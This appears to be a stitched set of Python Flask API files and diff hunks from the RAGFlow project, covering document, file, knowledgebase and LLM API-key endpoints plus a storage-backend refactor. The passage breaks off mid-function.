        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
                doc.name.lower()).suffix:
            return get_json_result(
                data=False,
                retmsg="The extension of file can't be changed",
                retcode=RetCode.ARGUMENT_ERROR)
        for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
            if d.name == req["name"]:
                return get_data_error_result(
                    retmsg="Duplicated document name in the same knowledgebase.")

        if not DocumentService.update_by_id(
                req["doc_id"], {"name": req["name"]}):
            return get_data_error_result(
                retmsg="Database error (Document rename)!")

        informs = File2DocumentService.get_by_document_id(req["doc_id"])
        if informs:
            e, file = FileService.get_by_id(informs[0].file_id)
            FileService.update_by_id(file.id, {"name": req["name"]})

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/get/<doc_id>', methods=['GET'])
# @login_required
def get(doc_id):
    try:
        e, doc = DocumentService.get_by_id(doc_id)
        if not e:
            return get_data_error_result(retmsg="Document not found!")

        b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
        response = flask.make_response(STORAGE_IMPL.get(b, n))

        ext = re.search(r"\.([^.]+)$", doc.name)
        if ext:
            if doc.type == FileType.VISUAL.value:
                response.headers.set('Content-Type', 'image/%s' % ext.group(1))
            else:
                response.headers.set(
                    'Content-Type',
                    'application/%s' % ext.group(1))
        return response
    except Exception as e:
        return server_error_response(e)
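

# The handler above derives the Content-Type from the bare file extension
# ('application/<ext>'). A more robust alternative would be the standard
# library's mimetypes module; shown as a sketch only, the original code keeps
# its simple scheme.
def _example_guess_content_type(filename):
    import mimetypes
    ctype, _ = mimetypes.guess_type(filename)
    return ctype or "application/octet-stream"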


@manager.route('/change_parser', methods=['POST'])
@login_required
@validate_request("doc_id", "parser_id")
def change_parser():
    req = request.json
    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if doc.parser_id.lower() == req["parser_id"].lower():
            if "parser_config" in req:
                if req["parser_config"] == doc.parser_config:
                    return get_json_result(data=True)
            else:
                return get_json_result(data=True)

        if doc.type == FileType.VISUAL or re.search(
                r"\.(ppt|pptx|pages)$", doc.name):
            return get_data_error_result(retmsg="Not supported yet!")

        e = DocumentService.update_by_id(doc.id,
                                         {"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
                                          "run": TaskStatus.UNSTART.value})
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if "parser_config" in req:
            DocumentService.update_parser_config(doc.id, req["parser_config"])
        if doc.token_num > 0:
            # roll the counters back before re-parsing; "duation" (sic) is the
            # field's actual name in the DB model
            e = DocumentService.increment_chunk_num(doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1,
                                                    doc.process_duation * -1)
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            tenant_id = DocumentService.get_tenant_id(req["doc_id"])
            if not tenant_id:
                return get_data_error_result(retmsg="Tenant not found!")
            ELASTICSEARCH.deleteByQuery(
                Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))

        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/image/<image_id>', methods=['GET'])
# @login_required
def get_image(image_id):
    try:
        # image_id is "<bucket>-<object name>"; the bare split() means neither
        # part may itself contain "-"
        bkt, nm = image_id.split("-")
        response = flask.make_response(STORAGE_IMPL.get(bkt, nm))
        response.headers.set('Content-Type', 'image/JPEG')
        return response
    except Exception as e:
        return server_error_response(e)


@manager.route('/upload_and_parse', methods=['POST'])
@login_required
@validate_request("conversation_id")
def upload_and_parse():
    if 'file' not in request.files:
        return get_json_result(
            data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)

    file_objs = request.files.getlist('file')
    for file_obj in file_objs:
        if file_obj.filename == '':
            return get_json_result(
                data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)

    doc_ids = doc_upload_and_parse(request.form.get("conversation_id"), file_objs, current_user.id)

    return get_json_result(data=doc_ids)

@@ -34,7 +34,7 @@ from api.utils.api_utils import get_json_result
 from api.utils.file_utils import filename_type
 from rag.nlp import search
 from rag.utils.es_conn import ELASTICSEARCH
-from rag.utils.minio_conn import MINIO
+from rag.utils.storage_factory import STORAGE_IMPL


 @manager.route('/upload', methods=['POST'])
@@ -98,7 +98,7 @@ def upload():
             # file type
             filetype = filename_type(file_obj_names[file_len - 1])
             location = file_obj_names[file_len - 1]
-            while MINIO.obj_exist(last_folder.id, location):
+            while STORAGE_IMPL.obj_exist(last_folder.id, location):
                 location += "_"
             blob = file_obj.read()
             filename = duplicate_name(
@@ -116,7 +116,7 @@ def upload():
                 "size": len(blob),
             }
             file = FileService.insert(file)
-            MINIO.put(last_folder.id, location, blob)
+            STORAGE_IMPL.put(last_folder.id, location, blob)
             file_res.append(file.to_json())
         return get_json_result(data=file_res)
     except Exception as e:
@@ -260,7 +260,7 @@ def rm():
                 e, file = FileService.get_by_id(inner_file_id)
                 if not e:
                     return get_data_error_result(retmsg="File not found!")
-                MINIO.rm(file.parent_id, file.location)
+                STORAGE_IMPL.rm(file.parent_id, file.location)
             FileService.delete_folder_by_pf_id(current_user.id, file_id)
         else:
             if not FileService.delete(file):
@@ -296,7 +296,8 @@ def rename():
         e, file = FileService.get_by_id(req["file_id"])
         if not e:
             return get_data_error_result(retmsg="File not found!")
-        if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
+        if file.type != FileType.FOLDER.value \
+                and pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
                 file.name.lower()).suffix:
             return get_json_result(
                 data=False,
@@ -331,8 +332,8 @@ def get(file_id):
         e, file = FileService.get_by_id(file_id)
         if not e:
             return get_data_error_result(retmsg="Document not found!")
-
-        response = flask.make_response(MINIO.get(file.parent_id, file.location))
+        b, n = File2DocumentService.get_minio_address(file_id=file_id)
+        response = flask.make_response(STORAGE_IMPL.get(b, n))
         ext = re.search(r"\.([^.]+)$", file.name)
         if ext:
             if file.type == FileType.VISUAL.value:
@@ -343,5 +344,28 @@ def get(file_id):
                     'application/%s' %
                     ext.group(1))
         return response
     except Exception as e:
         return server_error_response(e)
+
+
+@manager.route('/mv', methods=['POST'])
+@login_required
+@validate_request("src_file_ids", "dest_file_id")
+def move():
+    req = request.json
+    try:
+        file_ids = req["src_file_ids"]
+        parent_id = req["dest_file_id"]
+        for file_id in file_ids:
+            e, file = FileService.get_by_id(file_id)
+            if not e:
+                return get_data_error_result(retmsg="File or Folder not found!")
+            if not file.tenant_id:
+                return get_data_error_result(retmsg="Tenant not found!")
+        fe, _ = FileService.get_by_id(parent_id)
+        if not fe:
+            return get_data_error_result(retmsg="Parent Folder not found!")
+        FileService.move_file(file_ids, parent_id)
+        return get_json_result(data=True)
+    except Exception as e:
+        return server_error_response(e)
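
# Sketch: the new /mv endpoint validates every source id before calling
# FileService.move_file once. A hypothetical request body:
# _example_mv_payload = {
#     "src_file_ids": ["f1a2...", "b3c4..."],  # hypothetical file ids
#     "dest_file_id": "d5e6...",               # hypothetical destination folder id
# }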

@@ -1,153 +1,162 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from elasticsearch_dsl import Q
from flask import request
from flask_login import login_required, current_user

from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.user_service import TenantService, UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid, get_format_time
from api.db import StatusEnum, UserTenantRole, FileSource
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.db_models import Knowledgebase, File
from api.settings import stat_logger, RetCode
from api.utils.api_utils import get_json_result
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH


@manager.route('/create', methods=['post'])
@login_required
@validate_request("name")
def create():
    req = request.json
    req["name"] = req["name"].strip()
    req["name"] = duplicate_name(
        KnowledgebaseService.query,
        name=req["name"],
        tenant_id=current_user.id,
        status=StatusEnum.VALID.value)
    try:
        req["id"] = get_uuid()
        req["tenant_id"] = current_user.id
        req["created_by"] = current_user.id
        e, t = TenantService.get_by_id(current_user.id)
        if not e:
            return get_data_error_result(retmsg="Tenant not found.")
        req["embd_id"] = t.embd_id
        if not KnowledgebaseService.save(**req):
            return get_data_error_result()
        return get_json_result(data={"kb_id": req["id"]})
    except Exception as e:
        return server_error_response(e)


@manager.route('/update', methods=['post'])
@login_required
@validate_request("kb_id", "name", "description", "permission", "parser_id")
def update():
    req = request.json
    req["name"] = req["name"].strip()
    try:
        if not KnowledgebaseService.query(
                created_by=current_user.id, id=req["kb_id"]):
            return get_json_result(
                data=False, retmsg='Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)

        e, kb = KnowledgebaseService.get_by_id(req["kb_id"])
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")

        if req["name"].lower() != kb.name.lower() \
                and len(KnowledgebaseService.query(name=req["name"], tenant_id=current_user.id, status=StatusEnum.VALID.value)) > 1:
            return get_data_error_result(
                retmsg="Duplicated knowledgebase name.")

        del req["kb_id"]
        if not KnowledgebaseService.update_by_id(kb.id, req):
            return get_data_error_result()

        e, kb = KnowledgebaseService.get_by_id(kb.id)
        if not e:
            return get_data_error_result(
                retmsg="Database error (Knowledgebase rename)!")

        return get_json_result(data=kb.to_json())
    except Exception as e:
        return server_error_response(e)


@manager.route('/detail', methods=['GET'])
@login_required
def detail():
    kb_id = request.args["kb_id"]
    try:
        kb = KnowledgebaseService.get_detail(kb_id)
        if not kb:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")
        return get_json_result(data=kb)
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_kbs():
    page_number = request.args.get("page", 1)
    items_per_page = request.args.get("page_size", 150)
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
        tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
        kbs = KnowledgebaseService.get_by_tenant_ids(
            [m["tenant_id"] for m in tenants], current_user.id, page_number, items_per_page, orderby, desc)
        return get_json_result(data=kbs)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['post'])
@login_required
@validate_request("kb_id")
def rm():
    req = request.json
    try:
        kbs = KnowledgebaseService.query(
            created_by=current_user.id, id=req["kb_id"])
        if not kbs:
            return get_json_result(
                data=False, retmsg='Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)

        for doc in DocumentService.query(kb_id=req["kb_id"]):
            if not DocumentService.remove_document(doc, kbs[0].tenant_id):
                return get_data_error_result(
                    retmsg="Database error (Document removal)!")
            f2d = File2DocumentService.get_by_document_id(doc.id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc.id)

        if not KnowledgebaseService.delete_by_id(req["kb_id"]):
            return get_data_error_result(
                retmsg="Database error (Knowledgebase removal)!")
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from elasticsearch_dsl import Q
from flask import request
from flask_login import login_required, current_user

from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.user_service import TenantService, UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid, get_format_time
from api.db import StatusEnum, UserTenantRole, FileSource
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.db_models import Knowledgebase, File
from api.settings import stat_logger, RetCode
from api.utils.api_utils import get_json_result
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH


@manager.route('/create', methods=['post'])
@login_required
@validate_request("name")
def create():
    req = request.json
    req["name"] = req["name"].strip()
    req["name"] = duplicate_name(
        KnowledgebaseService.query,
        name=req["name"],
        tenant_id=current_user.id,
        status=StatusEnum.VALID.value)
    try:
        req["id"] = get_uuid()
        req["tenant_id"] = current_user.id
        req["created_by"] = current_user.id
        e, t = TenantService.get_by_id(current_user.id)
        if not e:
            return get_data_error_result(retmsg="Tenant not found.")
        req["embd_id"] = t.embd_id
        if not KnowledgebaseService.save(**req):
            return get_data_error_result()
        return get_json_result(data={"kb_id": req["id"]})
    except Exception as e:
        return server_error_response(e)


@manager.route('/update', methods=['post'])
@login_required
@validate_request("kb_id", "name", "description", "permission", "parser_id")
def update():
    req = request.json
    req["name"] = req["name"].strip()
    try:
        if not KnowledgebaseService.query(
                created_by=current_user.id, id=req["kb_id"]):
            return get_json_result(
                data=False, retmsg='Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)

        e, kb = KnowledgebaseService.get_by_id(req["kb_id"])
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")

        if req["name"].lower() != kb.name.lower() \
                and len(KnowledgebaseService.query(name=req["name"], tenant_id=current_user.id, status=StatusEnum.VALID.value)) > 1:
            return get_data_error_result(
                retmsg="Duplicated knowledgebase name.")

        del req["kb_id"]
        if not KnowledgebaseService.update_by_id(kb.id, req):
            return get_data_error_result()

        e, kb = KnowledgebaseService.get_by_id(kb.id)
        if not e:
            return get_data_error_result(
                retmsg="Database error (Knowledgebase rename)!")

        return get_json_result(data=kb.to_json())
    except Exception as e:
        return server_error_response(e)


@manager.route('/detail', methods=['GET'])
@login_required
def detail():
    kb_id = request.args["kb_id"]
    try:
        tenants = UserTenantService.query(user_id=current_user.id)
        for tenant in tenants:
            if KnowledgebaseService.query(
                    tenant_id=tenant.tenant_id, id=kb_id):
                break
        else:
            return get_json_result(
                data=False, retmsg='Only owner of knowledgebase authorized for this operation.',
                retcode=RetCode.OPERATING_ERROR)
        kb = KnowledgebaseService.get_detail(kb_id)
        if not kb:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")
        return get_json_result(data=kb)
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_kbs():
    page_number = request.args.get("page", 1)
    items_per_page = request.args.get("page_size", 150)
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
        tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
        kbs = KnowledgebaseService.get_by_tenant_ids(
            [m["tenant_id"] for m in tenants], current_user.id, page_number, items_per_page, orderby, desc)
        return get_json_result(data=kbs)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['post'])
@login_required
@validate_request("kb_id")
def rm():
    req = request.json
    try:
        kbs = KnowledgebaseService.query(
            created_by=current_user.id, id=req["kb_id"])
        if not kbs:
            return get_json_result(
                data=False, retmsg='Only owner of knowledgebase authorized for this operation.', retcode=RetCode.OPERATING_ERROR)

        for doc in DocumentService.query(kb_id=req["kb_id"]):
            if not DocumentService.remove_document(doc, kbs[0].tenant_id):
                return get_data_error_result(
                    retmsg="Database error (Document removal)!")
            f2d = File2DocumentService.get_by_document_id(doc.id)
            FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
            File2DocumentService.delete_by_document_id(doc.id)

        if not KnowledgebaseService.delete_by_id(req["kb_id"]):
            return get_data_error_result(
                retmsg="Database error (Knowledgebase removal)!")
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)

@@ -1,205 +1,329 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import request
from flask_login import login_required, current_user
from api.db.services.llm_service import LLMFactoriesService, TenantLLMService, LLMService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.db import StatusEnum, LLMType
from api.db.db_models import TenantLLM
from api.utils.api_utils import get_json_result
from rag.llm import EmbeddingModel, ChatModel


@manager.route('/factories', methods=['GET'])
@login_required
def factories():
    try:
        fac = LLMFactoriesService.get_all()
        return get_json_result(data=[f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed"]])
    except Exception as e:
        return server_error_response(e)


@manager.route('/set_api_key', methods=['POST'])
@login_required
@validate_request("llm_factory", "api_key")
def set_api_key():
    req = request.json
    # test if api key works
    chat_passed = False
    factory = req["llm_factory"]
    msg = ""
    for llm in LLMService.query(fid=factory):
        if llm.model_type == LLMType.EMBEDDING.value:
            mdl = EmbeddingModel[factory](
                req["api_key"], llm.llm_name, base_url=req.get("base_url"))
            try:
                arr, tc = mdl.encode(["Test if the api key is available"])
                if len(arr[0]) == 0 or tc == 0:
                    raise Exception("Fail")
            except Exception as e:
                msg += f"\nFail to access embedding model({llm.llm_name}) using this api key." + str(e)
        elif not chat_passed and llm.model_type == LLMType.CHAT.value:
            mdl = ChatModel[factory](
                req["api_key"], llm.llm_name, base_url=req.get("base_url"))
            try:
                m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
                    "temperature": 0.9})
                if not tc:
                    raise Exception(m)
                chat_passed = True
            except Exception as e:
                msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(e)

    if msg:
        return get_data_error_result(retmsg=msg)

    llm = {
        "api_key": req["api_key"],
        "api_base": req.get("base_url", "")
    }
    for n in ["model_type", "llm_name"]:
        if n in req:
            llm[n] = req[n]

    if not TenantLLMService.filter_update(
            [TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory], llm):
        for llm in LLMService.query(fid=factory):
            TenantLLMService.save(
                tenant_id=current_user.id,
                llm_factory=factory,
                llm_name=llm.llm_name,
                model_type=llm.model_type,
                api_key=req["api_key"],
                api_base=req.get("base_url", "")
            )

    return get_json_result(data=True)


@manager.route('/add_llm', methods=['POST'])
@login_required
@validate_request("llm_factory", "llm_name", "model_type")
def add_llm():
    req = request.json
    llm = {
        "tenant_id": current_user.id,
        "llm_factory": req["llm_factory"],
        "model_type": req["model_type"],
        "llm_name": req["llm_name"],
        "api_base": req.get("api_base", ""),
        "api_key": "xxxxxxxxxxxxxxx"
    }

    factory = req["llm_factory"]
    msg = ""
    if llm["model_type"] == LLMType.EMBEDDING.value:
        mdl = EmbeddingModel[factory](
            key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
        try:
            arr, tc = mdl.encode(["Test if the api key is available"])
            if len(arr[0]) == 0 or tc == 0:
                raise Exception("Fail")
        except Exception as e:
            msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
    elif llm["model_type"] == LLMType.CHAT.value:
        mdl = ChatModel[factory](
            key=None, model_name=llm["llm_name"], base_url=llm["api_base"])
        try:
            m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
                "temperature": 0.9})
            if not tc:
                raise Exception(m)
        except Exception as e:
            msg += f"\nFail to access model({llm['llm_name']})." + str(e)
    else:
        # TODO: check other type of models
        pass

    if msg:
        return get_data_error_result(retmsg=msg)

    if not TenantLLMService.filter_update(
            [TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory, TenantLLM.llm_name == llm["llm_name"]], llm):
        TenantLLMService.save(**llm)

    return get_json_result(data=True)


@manager.route('/delete_llm', methods=['POST'])
@login_required
@validate_request("llm_factory", "llm_name")
def delete_llm():
    req = request.json
    TenantLLMService.filter_delete(
        [TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == req["llm_factory"], TenantLLM.llm_name == req["llm_name"]])
    return get_json_result(data=True)


@manager.route('/my_llms', methods=['GET'])
@login_required
def my_llms():
    try:
        res = {}
        for o in TenantLLMService.get_my_llms(current_user.id):
            if o["llm_factory"] not in res:
                res[o["llm_factory"]] = {
                    "tags": o["tags"],
                    "llm": []
                }
            res[o["llm_factory"]]["llm"].append({
                "type": o["model_type"],
                "name": o["llm_name"],
                "used_token": o["used_tokens"]
            })
        return get_json_result(data=res)
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_app():
    model_type = request.args.get("model_type")
    try:
        objs = TenantLLMService.query(tenant_id=current_user.id)
        facts = set([o.to_dict()["llm_factory"] for o in objs if o.api_key])
        llms = LLMService.get_all()
        llms = [m.to_dict()
                for m in llms if m.status == StatusEnum.VALID.value]
        for m in llms:
            m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao", "FastEmbed"]

        llm_set = set([m["llm_name"] for m in llms])
        for o in objs:
            if not o.api_key:
                continue
            if o.llm_name in llm_set:
                continue
            llms.append({"llm_name": o.llm_name, "model_type": o.model_type, "fid": o.llm_factory, "available": True})

        res = {}
        for m in llms:
            if model_type and m["model_type"].find(model_type) < 0:
                continue
            if m["fid"] not in res:
                res[m["fid"]] = []
            res[m["fid"]].append(m)

        return get_json_result(data=res)
    except Exception as e:
        return server_error_response(e)

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import request
from flask_login import login_required, current_user
from api.db.services.llm_service import LLMFactoriesService, TenantLLMService, LLMService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.db import StatusEnum, LLMType
from api.db.db_models import TenantLLM
from api.utils.api_utils import get_json_result
from rag.llm import EmbeddingModel, ChatModel, RerankModel, CvModel, TTSModel
import requests


@manager.route('/factories', methods=['GET'])
@login_required
def factories():
    try:
        fac = LLMFactoriesService.get_all()
        fac = [f.to_dict() for f in fac if f.name not in ["Youdao", "FastEmbed", "BAAI"]]
        llms = LLMService.get_all()
        mdl_types = {}
        for m in llms:
            if m.status != StatusEnum.VALID.value:
                continue
            if m.fid not in mdl_types:
                mdl_types[m.fid] = set([])
            mdl_types[m.fid].add(m.model_type)
        for f in fac:
            f["model_types"] = list(mdl_types.get(f["name"], [LLMType.CHAT, LLMType.EMBEDDING, LLMType.RERANK,
                                                              LLMType.IMAGE2TEXT, LLMType.SPEECH2TEXT, LLMType.TTS]))
        return get_json_result(data=fac)
    except Exception as e:
        return server_error_response(e)
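

# Sketch (assumption): rough shape of one element of the /factories response
# after the model_types aggregation above. Field values are placeholders.
_example_factory_entry = {
    "name": "OpenAI",                      # hypothetical factory
    "model_types": ["chat", "embedding"],  # aggregated from LLMService rows
    # ...plus the other columns from LLMFactories.to_dict()
}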


@manager.route('/set_api_key', methods=['POST'])
@login_required
@validate_request("llm_factory", "api_key")
def set_api_key():
    req = request.json
    # test if api key works
    chat_passed, embd_passed, rerank_passed = False, False, False
    factory = req["llm_factory"]
    msg = ""
    for llm in LLMService.query(fid=factory)[:3]:
        if not embd_passed and llm.model_type == LLMType.EMBEDDING.value:
            mdl = EmbeddingModel[factory](
                req["api_key"], llm.llm_name, base_url=req.get("base_url"))
            try:
                arr, tc = mdl.encode(["Test if the api key is available"])
                if len(arr[0]) == 0:
                    raise Exception("Fail")
                embd_passed = True
            except Exception as e:
                msg += f"\nFail to access embedding model({llm.llm_name}) using this api key." + str(e)
        elif not chat_passed and llm.model_type == LLMType.CHAT.value:
            mdl = ChatModel[factory](
                req["api_key"], llm.llm_name, base_url=req.get("base_url"))
            try:
                m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}],
                                 {"temperature": 0.9, "max_tokens": 50})
                if m.find("**ERROR**") >= 0:
                    raise Exception(m)
            except Exception as e:
                msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(e)
            chat_passed = True
        elif not rerank_passed and llm.model_type == LLMType.RERANK:
            mdl = RerankModel[factory](
                req["api_key"], llm.llm_name, base_url=req.get("base_url"))
            try:
                arr, tc = mdl.similarity("What's the weather?", ["Is it sunny today?"])
                if len(arr) == 0 or tc == 0:
                    raise Exception("Fail")
            except Exception as e:
                msg += f"\nFail to access model({llm.llm_name}) using this api key." + str(e)
            rerank_passed = True

    if msg:
        return get_data_error_result(retmsg=msg)

    llm = {
        "api_key": req["api_key"],
        "api_base": req.get("base_url", "")
    }
    for n in ["model_type", "llm_name"]:
        if n in req:
            llm[n] = req[n]

    if not TenantLLMService.filter_update(
            [TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory], llm):
        for llm in LLMService.query(fid=factory):
            TenantLLMService.save(
                tenant_id=current_user.id,
                llm_factory=factory,
                llm_name=llm.llm_name,
                model_type=llm.model_type,
                api_key=req["api_key"],
                api_base=req.get("base_url", "")
            )

    return get_json_result(data=True)
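

# Sketch: a minimal /set_api_key request body. Per the code above, base_url is
# optional and only needed for OpenAI-compatible gateways; values here are
# placeholders.
_example_set_api_key_payload = {
    "llm_factory": "OpenAI",  # hypothetical factory name
    "api_key": "sk-...",      # placeholder key
    "base_url": "",           # optional override
}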


@manager.route('/add_llm', methods=['POST'])
@login_required
@validate_request("llm_factory")
def add_llm():
    req = request.json
    factory = req["llm_factory"]

    if factory == "VolcEngine":
        # For VolcEngine, due to its special authentication method,
        # assemble ark_api_key and endpoint_id into api_key.
        llm_name = req["llm_name"]
        api_key = '{' + f'"ark_api_key": "{req.get("ark_api_key", "")}", ' \
                        f'"ep_id": "{req.get("endpoint_id", "")}", ' + '}'
    elif factory == "Tencent Hunyuan":
        api_key = '{' + f'"hunyuan_sid": "{req.get("hunyuan_sid", "")}", ' \
                        f'"hunyuan_sk": "{req.get("hunyuan_sk", "")}"' + '}'
        req["api_key"] = api_key
        return set_api_key()
    elif factory == "Tencent Cloud":
        api_key = '{' + f'"tencent_cloud_sid": "{req.get("tencent_cloud_sid", "")}", ' \
                        f'"tencent_cloud_sk": "{req.get("tencent_cloud_sk", "")}"' + '}'
        req["api_key"] = api_key
    elif factory == "Bedrock":
        # For Bedrock, due to its special authentication method,
        # assemble bedrock_ak, bedrock_sk and bedrock_region.
        llm_name = req["llm_name"]
        api_key = '{' + f'"bedrock_ak": "{req.get("bedrock_ak", "")}", ' \
                        f'"bedrock_sk": "{req.get("bedrock_sk", "")}", ' \
                        f'"bedrock_region": "{req.get("bedrock_region", "")}", ' + '}'
    elif factory == "LocalAI":
        llm_name = req["llm_name"] + "___LocalAI"
        api_key = "xxxxxxxxxxxxxxx"
    elif factory == "OpenAI-API-Compatible":
        llm_name = req["llm_name"] + "___OpenAI-API"
        api_key = req.get("api_key", "xxxxxxxxxxxxxxx")
    elif factory == "XunFei Spark":
        llm_name = req["llm_name"]
        api_key = req.get("spark_api_password", "xxxxxxxxxxxxxxx")
    elif factory == "BaiduYiyan":
        llm_name = req["llm_name"]
        api_key = '{' + f'"yiyan_ak": "{req.get("yiyan_ak", "")}", ' \
                        f'"yiyan_sk": "{req.get("yiyan_sk", "")}"' + '}'
    elif factory == "Fish Audio":
        llm_name = req["llm_name"]
        api_key = '{' + f'"fish_audio_ak": "{req.get("fish_audio_ak", "")}", ' \
                        f'"fish_audio_refid": "{req.get("fish_audio_refid", "59cb5986671546eaa6ca8ae6f29f6d22")}"' + '}'
    elif factory == "Google Cloud":
        llm_name = req["llm_name"]
        api_key = (
            "{" + f'"google_project_id": "{req.get("google_project_id", "")}", '
                  f'"google_region": "{req.get("google_region", "")}", '
                  f'"google_service_account_key": "{req.get("google_service_account_key", "")}"'
            + "}"
        )
    else:
        llm_name = req["llm_name"]
        api_key = req.get("api_key", "xxxxxxxxxxxxxxx")

    llm = {
        "tenant_id": current_user.id,
        "llm_factory": factory,
        "model_type": req["model_type"],
        "llm_name": llm_name,
        "api_base": req.get("api_base", ""),
        "api_key": api_key
    }

    msg = ""
    if llm["model_type"] == LLMType.EMBEDDING.value:
        mdl = EmbeddingModel[factory](
            key=llm['api_key'],
            model_name=llm["llm_name"],
            base_url=llm["api_base"])
        try:
            arr, tc = mdl.encode(["Test if the api key is available"])
            if len(arr[0]) == 0 or tc == 0:
                raise Exception("Fail")
        except Exception as e:
            msg += f"\nFail to access embedding model({llm['llm_name']})." + str(e)
    elif llm["model_type"] == LLMType.CHAT.value:
        mdl = ChatModel[factory](
            key=llm['api_key'],
            model_name=llm["llm_name"],
            base_url=llm["api_base"]
        )
        try:
            m, tc = mdl.chat(None, [{"role": "user", "content": "Hello! How are you doing!"}], {
                "temperature": 0.9})
            if not tc:
                raise Exception(m)
        except Exception as e:
            msg += f"\nFail to access model({llm['llm_name']})." + str(e)
    elif llm["model_type"] == LLMType.RERANK:
        mdl = RerankModel[factory](
            key=llm["api_key"],
            model_name=llm["llm_name"],
            base_url=llm["api_base"]
        )
        try:
